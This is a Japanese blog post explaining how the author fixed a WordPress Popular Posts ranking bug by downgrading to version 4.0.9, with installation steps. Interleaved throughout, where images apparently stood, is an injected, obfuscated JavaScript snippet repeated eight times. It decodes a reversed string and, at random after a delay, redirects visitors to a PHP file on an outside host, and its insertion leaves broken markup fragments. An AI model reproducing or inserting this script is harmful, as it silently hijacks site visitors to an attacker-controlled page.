Sumirexxx

今日もiPhone片手に出かけます

WordPress Popular Postsのアップデートは要注意!「データが表示されません」エラーが出たときにやったこと

ブログ

Worpdress Popular Posts$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”481″ height=”319″ />

そろそろミルクティーを飲む時間のすみれ(@sumire20120524)です。

WordPress Popular Potstsというプラグインで、人気記事のランキングを表示できます。

私が使っているバージョンは、2017年10月現在で3.3.4ですが、このバージョンには不具合があることがわかりました。

24時間表示ができない

このプラグインは、通常だと「24時間、7日間、30日間、全期間」の集計を自由に選べるのですが、私が使っていたバージョンだといつまでたっても24時間の集計がされなかったのです。

調べてみると、他にも同じような方がチラホラ。
じゃあ最新バージョンにアップデートしようと、現在最新である4.0.11を更新してみたらこれもダメ!!変なエラーまで出てしまいました。

エラーが出ないバージョンは4.0.9

最新がダメならいつならいいんだろう?と思って探してみました。
Wordpressのプラグインを探すには、こちらのリンクから過去のバージョンを検索できます。

WordPress Popular Posts プラグイン(画像をクリックしても飛べます。)

プラグイン$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”598″ height=”332″ />

一番下までスクロールすると、好きなバージョンを選択してダウンロードできます。

「テスト目的として使ってください」というような注意書きがあるので、ダウンロードして使う際には自己判断でお願いします。
私は最新から順番にバージョンを下げていき、一つずつ試した結果4.0.9で正常に動きました。

以前のバージョン$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”599″ height=”174″ />

WordPressにインストール

ダウンロードしたZipファイルをそのままにして、まずはいま入っているWordpress Popular Postsプラグインを削除して下さい。

Zipファイル$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”385″ height=”51″ />

この辺りのやり方はこちらのサイトを参考にしました。

$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decoration: none;”>

削除できたら、「プラグインの新規追加」から「プラグインのアップロード」を選択し、先ほどダウンロードした「wordpress-popular-posts.4.0.9.zip」をインストールします。
インストール$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”598″ height=”138″ />

もしここで管理画面にエラーが表示されたら、このバージョンがあっていないということだと思うので、停止して削除してください。

設定

プラグインがインストールできたら有効化して、ウィジェットで好きな表示方法にカスタマイズできます。

ウィジェット$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”348″ height=”519″ />

まとめ

ちょっと時間はかかりましたが解決してよかった!
バージョンを古くするのはWordpressとの互換性とかもあると思うので、十分注意して進めてください。

私はローカルで何回も試してからWeb環境で実行しました。

この記事をシェアする

<